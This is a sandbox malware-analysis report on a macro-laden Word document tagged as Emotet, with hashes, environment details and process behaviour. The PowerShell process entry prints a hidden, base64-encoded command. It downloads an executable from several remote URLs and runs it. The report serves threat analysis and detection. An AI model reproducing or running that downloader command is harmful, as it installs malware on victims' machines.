General Info

File name

f52154c8c11e48bc48c41bb84c9f09931b50e2f73e2facb5b888402a9aae05a3

Full analysis
https://app.any.run/tasks/b29d0d15-e283-45e9-80c6-72ef9d075a02
Verdict
Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker

More details
Analysis date
12/2/2019, 21:19:33
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

macros

macros-on-open

maldoc-4

generated-doc

emotet-doc

emotet

Indicators:
No indicators

MIME:
application/msword
File info:
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Vel consequuntur dicta., Author: Ole Dietrich, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 20 12:50:00 2019, Last Saved Time/Date: Wed Nov 20 12:50:00 2019, Number of Pages: 1, Number of Words: 20, Number of Characters: 117, Security: 0
MD5

8a14986e256a03c1d24b219777a774bd

SHA1

968ce452b29b67a976b5467d54bb8c1167dea4d4

SHA256

f52154c8c11e48bc48c41bb84c9f09931b50e2f73e2facb5b888402a9aae05a3

SSDEEP

1536:Q6DT5VlMeOY5C6OJsdBpZWCRI6VHzGC2+ra/AmYv1zGuCAKfIYkt6ZW7ngxrtN:hDT5VCeOY5CTsdACdij+sjYNzDi7

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
60 seconds
Additional time used
none
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (75.0.3770.100)
  • Google Update Helper (1.3.34.7)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.7.2 (4.7.03062)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Groove MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Language Pack 2010 - French/Français (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - German/Deutsch (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Italian/Italiano (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Japanese/日本語 (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Korean/한국어 (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Portuguese/Português (Brasil) (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Russian/русский (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Spanish/Español (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Turkish/Türkçe (14.0.4763.1013)
  • Microsoft Office O MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Arabic) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Basque) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Catalan) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Dutch) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Galician) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (German) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Proof (Ukrainian) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (French) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (German) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office SharePoint Designer MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office X MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
  • Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
  • Mozilla Firefox 68.0.1 (x86 en-US) (68.0.1)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB4019990
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO

No malicious indicators.

 PowerShell script executed
  • powershell.exe (PID: 1036)
Executed via WMI
  • powershell.exe (PID: 1036)
Creates files in the user directory
  • powershell.exe (PID: 1036)
 Reads Microsoft Office registry keys
  • WINWORD.EXE (PID: 688)
Creates files in the user directory
  • WINWORD.EXE (PID: 688)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.doc
|   Microsoft Word document (54.2%)
.doc
|   Microsoft Word document (old ver.) (32.2%)
EXIF
FlashPix
Title:
Vel consequuntur dicta.
Subject:
null
Author:
Ole Dietrich
Keywords:
null
Comments:
null
Template:
Normal.dotm
LastModifiedBy:
null
RevisionNumber:
1
Software:
Microsoft Office Word
TotalEditTime:
null
CreateDate:
2019:11:20 12:50:00
ModifyDate:
2019:11:20 12:50:00
Pages:
1
Words:
20
Characters:
117
Security:
None
CodePage:
Windows Latin 1 (Western European)
Company:
null
Lines:
1
Paragraphs:
1
CharCountWithSpaces:
136
AppVersion:
16
ScaleCrop:
No
LinksUpToDate:
No
SharedDoc:
No
HyperlinksChanged:
No
TitleOfParts:
null
HeadingPairs
null
null
CompObjUserTypeLen:
25
CompObjUserType:
Microsoft Forms 2.0 Form

Screenshots

Screenshot of f52154c8c11e48bc48c41bb84c9f09931b50e2f73e2facb5b888402a9aae05a3 taken from 18004 ms from task started Screenshot of f52154c8c11e48bc48c41bb84c9f09931b50e2f73e2facb5b888402a9aae05a3 taken from 19052 ms from task started Screenshot of f52154c8c11e48bc48c41bb84c9f09931b50e2f73e2facb5b888402a9aae05a3 taken from 20058 ms from task started

Processes

Total processes
35
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

+
start winword.exe no specs powershell.exe
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
688
CMD
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\f52154c8c11e48bc48c41bb84c9f09931b50e2f73e2facb5b888402a9aae05a3.doc"
Path
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft Word
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ole32.dll
c:\program files\microsoft office\office14\gfx.dll
c:\program files\microsoft office\office14\oart.dll
c:\windows\system32\msi.dll
c:\windows\system32\apphelp.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\program files\common files\microsoft shared\office14\msptls.dll
c:\windows\system32\uxtheme.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\sxs.dll
c:\progra~1\micros~1\office14\genko.dll
c:\windows\system32\wininet.dll
c:\windows\system32\msasn1.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\program files\microsoft office\office14\gkword.dll
c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll
c:\windows\system32\fontsub.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\fm20.dll
c:\windows\system32\comdlg32.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\fm20enu.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbem\wmiutils.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\imm32.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\winspool.drv
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll
c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll
c:\program files\common files\microsoft shared\office14\usp10.dll
c:\windows\system32\wbem\wbemdisp.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\windowscodecs.dll

PID
1036
CMD
powershell -w hidden -enco JABDAHoAZwBqAGEAeQBlAHMAdABzAHEAdAB4AD0AJwBaAGoAbQB1AGQAZgBmAGkAcwAnADsAJABEAGYAawB6AG4AYQBmAGEAaQBkAHgAegBtACAAPQAgACcANgA2ADgAJwA7ACQATQBjAHIAeQBlAGwAagBmAGcAdgBlAD0AJwBaAG4AcQBoAHgAZwBpAHYAZQBlAG8AbgBzACcAOwAkAFYAZgBvAHkAcgBvAGcAaABnAGMAbgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQARABmAGsAegBuAGEAZgBhAGkAZAB4AHoAbQArACcALgBlAHgAZQAnADsAJABXAHEAbgByAGIAbAByAHEAYwB1AGwAaQA9ACcAWABkAGUAbAB4AGUAcwBwACcAOwAkAE8AdABmAHQAbgBjAGwAaQBzAGkAPQAuACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqAGUAJwArACcAYwAnACsAJwB0ACcAKQAgAE4ARQB0AC4AdwBFAGIAYwBMAEkAZQBOAFQAOwAkAEYAbgB6AHkAaQBxAGgAaQA9ACcAaAB0AHQAcAA6AC8ALwBhAGwAbAAuAHUAZwBtAHUAegBpAGsALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGkAZABjADgAaQBkAHcALQBhADQAegA4AGEAdQAtADYANwA2ADMANQA4AC8AKgBoAHQAdABwAHMAOgAvAC8AYQB3AGEAbAAxADIAMgAxADgAMgAuADAAMAAwAHcAZQBiAGgAbwBzAHQAYQBwAHAALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGIANwA3AGMAYQB3ADYAMAAtAGsAaABuAC0ANwA5ADgAOAA1ADgANAAvACoAaAB0AHQAcABzADoALwAvAHoAeQBsAG8AawBrAC4AMAAwADAAdwBlAGIAaABvAHMAdABhAHAAcAAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFIARgBoAEwAdABvAEYALwAqAGgAdAB0AHAAcwA6AC8ALwByAGEAYwBpAG4AZwB0AHUAcgB0AGwAZQBzAGcAMAA3AC4AMAAwADAAdwBlAGIAaABvAHMAdABhAHAAcAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AZwA3ADMAMwBxAGIAZgBpAHEAYQAtAGgAawBkADgAMwA1AHoAeQAtADEAMQA5ADkALwAqAGgAdAB0AHAAOgAvAC8AaQBkAGUAYQBsAG4AZQB3AGgAbwBtAGUAcwAuAGMAbwBtAC8AcwBlAGkAdABlAF8AMwAvAHAAMwBqAGsANgB1AGwAMAB5AC0AYQBhAGQAMQB3AC0ANQA3ADcANgA4ADAANwA3AC8AJwAuACIAcwBgAHAATABpAHQAIgAoACcAKgAnACkAOwAkAEsAcQBzAGkAeABkAGwAbQBsAHIAaQBwAD0AJwBaAGwAaAB3AG4AbQBsAHkAdAB1ACcAOwBmAG8AcgBlAGEAYwBoACgAJABLAGIAdwBuAHEAaABsAHEAaQBmAHIAIABpAG4AIAAkAEYAbgB6AHkAaQBxAGgAaQApAHsAdAByAHkAewAkAE8AdABmAHQAbgBjAGwAaQBzAGkALgAiAEQATwB3AE4AYABsAG8AYABBAEQAZgBpAEwAZQAiACgAJABLAGIAdwBuAHEAaABsAHEAaQBmAHIALAAgACQAVgBmAG8AeQByAG8AZwBoAGcAYwBuACkAOwAkAEoAYgB1AHYAegBoAHAAcgA9ACcAUwBqAHMAegBqAHoAdwB4AHMAaQAnADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFYAZgBvAHkAcgBvAGcAaABnAGMAbgApAC4AIgBMAGUATgBgAEcAdABIACIAIAAtAGcAZQAgADMANgA0ADYAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAYABBAFIAdAAiACgAJABWAGYAbwB5AHIAbwBnAGgAZwBjAG4AKQA7ACQATAB3AHcAYgBvAGsAbAB4AHgAYwA9ACcASgByAHEAcwBhAGEAcQBmAG8AcwB5AGQAJwA7AGIAcgBlAGEAawA7ACQATQBiAHcAYwB4AGYAcgBvAD0AJwBDAGcAYQBoAHYAbgB2AGcAdgBmAHoAaABnACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEkAZQBtAHkAcwB4AHMAbQBrAHgAawA9ACcARQBzAGMAdgBpAHIAcAB1AHoAaQBrAGIAJwA=
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\atl.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\imm32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
